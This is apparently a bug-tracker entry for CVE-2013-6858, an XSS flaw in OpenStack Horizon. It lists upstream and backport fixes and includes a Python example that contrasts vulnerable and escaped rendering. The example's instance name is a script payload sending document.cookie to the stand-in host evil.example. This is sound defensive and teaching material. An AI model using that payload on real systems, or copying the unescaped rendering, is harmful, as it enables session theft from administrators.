Common Vulnerabilities and Exposures assigned an identifier CVE-2013-6858 to the following vulnerability:

Name: CVE-2013-6858
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6858
Assigned: 20131123
Reference: https://bugs.launchpad.net/horizon/+bug/1247675
Reference: SECUNIA:55770
Reference: http://secunia.com/advisories/55770

Multiple cross-site scripting (XSS) vulnerabilities in OpenStack Dashboard (Horizon) 2013.2 and earlier allow local users to inject arbitrary web script or HTML via an instance name on the (1) "Volumes" or (2) "Network Topology" page.
fix proposed upstream: https://review.openstack.org/#/c/58256/ (it's a backport)
*** Bug 1035907 has been marked as a duplicate of this bug. ***
Icehouse (development branch) fix: https://review.openstack.org/55175
Havana fix: https://review.openstack.org/58465
Grizzly fix: https://review.openstack.org/58820

Description: Cisco PSIRT reported a vulnerability in the OpenStack Horizon dashboard. By embedding HTML tags in an Instance Name, a tenant may execute a script within an administrator's browser, resulting in a cross-site scripting (XSS) attack. Only setups using the Horizon dashboard are affected.
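The following is an added illustration of the attack pattern in the Description above; it is example code written for this page, not Horizon's own templates or the upstream fix. It assumes a dashboard that builds a "Volumes" table row by string interpolation and a "Network Topology" page that embeds instance data as JSON inside an inline script tag; the instance name, markup and function names are constructed for the example. It shows why a tenant-chosen name breaks out of both contexts and what the escaped equivalents look like, including the case where JSON quoting alone is not enough.

```python
"""Stored XSS via an untrusted instance name: vulnerable rendering beside
the hardened form, for an HTML table cell and for JSON inside <script>.
Constructed example; not code from Horizon or from the CVE fix."""
import html
import json
import re

# Constructed attacker-chosen instance name; a tenant can set this freely.
MALICIOUS_NAME = ('<script>document.location="http://evil.example/?c="'
                  '+document.cookie</script>')


def render_volume_row_vulnerable(volume_id: str, instance_name: str) -> str:
    """Naive template: the name is concatenated straight into the markup,
    so any tag in it is parsed as part of the admin's page."""
    return f'<tr><td>{volume_id}</td><td>Attached to {instance_name}</td></tr>'


def render_volume_row_hardened(volume_id: str, instance_name: str) -> str:
    """Escape every untrusted value at the point it enters an HTML context."""
    return (f'<tr><td>{html.escape(volume_id)}</td>'
            f'<td>Attached to {html.escape(instance_name)}</td></tr>')


def topology_script_vulnerable(instances) -> str:
    """Inline JSON for a JS topology widget. json.dumps quotes the string,
    but a literal '</script>' inside it still terminates the script element
    in the browser's HTML parser before the JS parser ever sees the JSON."""
    payload = json.dumps([{"name": i["name"]} for i in instances])
    return f'<script>var topology = {payload};</script>'


def topology_script_hardened(instances) -> str:
    """Same widget, but '<', '>' and '&' inside the JSON text are written as
    \\u00XX escapes, so the serialized text can never contain '</script>'
    while JSON.parse / the JS engine still read the original characters."""
    payload = json.dumps([{"name": i["name"]} for i in instances])
    payload = (payload.replace('<', '\\u003c')
                      .replace('>', '\\u003e')
                      .replace('&', '\\u0026'))
    return f'<script>var topology = {payload};</script>'


_SCRIPT_TAG_RE = re.compile(r'<\s*/?\s*script\b', re.IGNORECASE)


def count_script_tags(markup: str) -> int:
    """Count raw <script ...> / </script> tokens an HTML parser would see.
    The hardened outputs must contain only the ones the page itself wrote."""
    return len(_SCRIPT_TAG_RE.findall(markup))


def decode_topology(markup: str):
    """Recover the JSON the JS engine would evaluate, to show the hardened
    form still carries the exact instance name (escaping, not stripping)."""
    start = markup.index('var topology = ') + len('var topology = ')
    end = markup.rindex(';</script>')
    return json.loads(markup[start:end])


if __name__ == "__main__":
    row = render_volume_row_vulnerable("vol-1", MALICIOUS_NAME)
    print("vulnerable row script tags:", count_script_tags(row))
    print("hardened row script tags:",
          count_script_tags(render_volume_row_hardened("vol-1", MALICIOUS_NAME)))
    topo = topology_script_vulnerable([{"name": MALICIOUS_NAME}])
    print("vulnerable topology script tags:", count_script_tags(topo))
    print("hardened topology script tags:",
          count_script_tags(topology_script_hardened([{"name": MALICIOUS_NAME}])))
```

The point of the second pair is the one that usually bites "Network Topology"-style pages: the data is already JSON-encoded and looks safe, yet it sits inside an HTML document, so it has to be safe for the HTML parser first. Escaping angle brackets as `\u003c`/`\u003e` keeps the JSON valid and the name intact, whereas stripping tags would change tenant data.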
Created attachment 833693 [details] cve-2013-6858-master-icehouse.patch
Created attachment 833694 [details] cve-2013-6858-stable-havana.patch
Created attachment 833696 [details] cve-2013-6858-stable-grizzly.patch
For Icehouse and (especially) Havana, packages are already built and the fixes have been included for a while now. For Grizzly, the patch has not been merged upstream yet.
This issue has been addressed in the following products:

OpenStack 3 for RHEL 6
Via RHSA-2014:0365 https://rhn.redhat.com/errata/RHSA-2014-0365.html